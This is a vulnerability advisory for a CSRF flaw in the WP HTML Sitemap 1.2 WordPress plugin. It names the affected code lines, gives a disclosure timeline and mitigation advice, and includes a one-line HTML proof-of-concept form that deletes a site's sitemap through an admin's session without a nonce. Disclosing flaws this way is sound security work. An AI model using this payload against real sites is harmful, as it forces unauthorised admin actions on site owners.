CVSS Summary
| Score | 4.3 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | None |
| Integrity | Partial |
| Availability | None |
Advisory:
CSRF vulnerability in WP HTML Sitemap 1.2
Vulnerability
Last revised:
A CSRF vulnerability exists which allows an attacker to delete the sitemap if a logged-in admin user visits a link of the attacker’s choosing.
Line 202 of inc/AdminPage.php says “// check whether form was just submitted” but the following if/elseif statements only check whether a particular button was pressed without checking nonce values. The form in question is printed in wp_html_sitemap_AdminPage::createSitemapForm() around line 146 of the same file.
Current state: Reported
Proof of concept
This form deletes the sitemap without requiring a nonce value:
<form action="http://not-a-real-site.local/wp-admin/options-general.php?page=wp-html-sitemap&tab=general" method="POST"> <input type="text" name="deleteSitemap" value="Delete Sitemap"> <input type="submit"> </form>
Advisory timeline
- 2014-02-21: Discovered
- 2014-02-26: Reported
- 2014-03-28: No response received. Published
Mitigation/further actions
Disable the plugin until a fix is available.